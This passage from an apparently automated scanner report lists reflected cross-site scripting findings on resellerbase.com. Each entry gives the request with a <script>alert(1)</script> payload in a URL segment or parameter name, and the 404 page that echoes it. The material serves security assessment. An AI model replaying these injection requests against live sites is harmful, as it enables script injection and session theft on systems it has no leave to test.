User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/142a8d6<script>alert(1)</script>22e40c8b6b4/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1153. http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bb87d<script>alert(1)</script>57a184d62c7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themesbb87d<script>alert(1)</script>57a184d62c7/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themesbb87d<script>alert(1)</script>57a184d62c7/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1154. http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload de783<script>alert(1)</script>4bb4874f72c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes/kosmosde783<script>alert(1)</script>4bb4874f72c/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmosde783<script>alert(1)</script>4bb4874f72c/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1155. http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 5ed27<script>alert(1)</script>164f5e25b74 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes/kosmos/images5ed27<script>alert(1)</script>164f5e25b74/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos/images5ed27<script>alert(1)</script>164f5e25b74/rating/ was not found on this server.</p>
...[SNIP]...

2.1156. http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload c3284<script>alert(1)</script>33a33f4b3b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes/kosmos/images/ratingc3284<script>alert(1)</script>33a33f4b3b/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos/images/ratingc3284<script>alert(1)</script>33a33f4b3b/ was not found on this server.</p>
...[SNIP]...

2.1157. http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e03e0<script>alert(1)</script>d1554004063 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes/kosmos/images/rating/?e03e0<script>alert(1)</script>d1554004063=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos/images/rating/?e03e0<script>alert(1)</script>d1554004063=1 was not found on this server.</p>
...[SNIP]...

2.1158. http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/4half.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 52daf<script>alert(1)</script>088dd4be227 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail52daf<script>alert(1)</script>088dd4be227/14/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:30:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail52daf<script>alert(1)</script>088dd4be227/14/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.1159. http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/4half.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2b2d9<script>alert(1)</script>82a6b256881 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/142b2d9<script>alert(1)</script>82a6b256881/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:30:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/142b2d9<script>alert(1)</script>82a6b256881/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.1160. http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/4half.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1d088<script>alert(1)</script>841e4a491a8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes1d088<script>alert(1)</script>841e4a491a8/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:30:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes1d088<script>alert(1)</script>841e4a491a8/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.1161. http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/4half.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ab83d<script>alert(1)</script>32330b93f73 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes/kosmosab83d<script>alert(1)</script>32330b93f73/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmosab83d<script>alert(1)</script>32330b93f73/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.1162. http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/4half.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 4b0e7<script>alert(1)</script>88b97ae7152 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes/kosmos/images4b0e7<script>alert(1)</script>88b97ae7152/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos/images4b0e7<script>alert(1)</script>88b97ae7152/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.1163. http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/4half.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 41098<script>alert(1)</script>af4bad604d6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes/kosmos/images/rating41098<script>alert(1)</script>af4bad604d6/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos/images/rating41098<script>alert(1)</script>af4bad604d6/4half.gif was not found on this server.</p>
...[SNIP]...

2.1164. http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/4half.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload a6c37<script>alert(1)</script>161f350d27f was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes/kosmos/images/rating/4half.gifa6c37<script>alert(1)</script>161f350d27f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos/images/rating/4half.gifa6c37<script>alert(1)</script>161f350d27f was not found on this server.</p>
...[SNIP]...

2.1165. http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/4half.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/images/rating/4half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f718b<script>alert(1)</script>4c9856a1bc1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes/kosmos/images/rating/4half.gif?f718b<script>alert(1)</script>4c9856a1bc1=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:29:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos/images/rating/4half.gif?f718b<script>alert(1)</script>4c9856a1bc1=1 was not found on this server.</p>
...[SNIP]...

2.1166. http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 44fda<script>alert(1)</script>cf8ba662e94 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail44fda<script>alert(1)</script>cf8ba662e94/14/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail44fda<script>alert(1)</script>cf8ba662e94/14/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1167. http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 66de4<script>alert(1)</script>f3558803c31 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/1466de4<script>alert(1)</script>f3558803c31/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1466de4<script>alert(1)</script>f3558803c31/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1168. http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 17fcc<script>alert(1)</script>2be3ee3955b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes17fcc<script>alert(1)</script>2be3ee3955b/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes17fcc<script>alert(1)</script>2be3ee3955b/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1169. http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload fa2cf<script>alert(1)</script>6ea6d2ebfbc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes/kosmosfa2cf<script>alert(1)</script>6ea6d2ebfbc/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmosfa2cf<script>alert(1)</script>6ea6d2ebfbc/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1170. http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 72b6d<script>alert(1)</script>d929cd695f4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes/kosmos/images72b6d<script>alert(1)</script>d929cd695f4/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos/images72b6d<script>alert(1)</script>d929cd695f4/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1171. http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload e9983<script>alert(1)</script>385e627a963 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

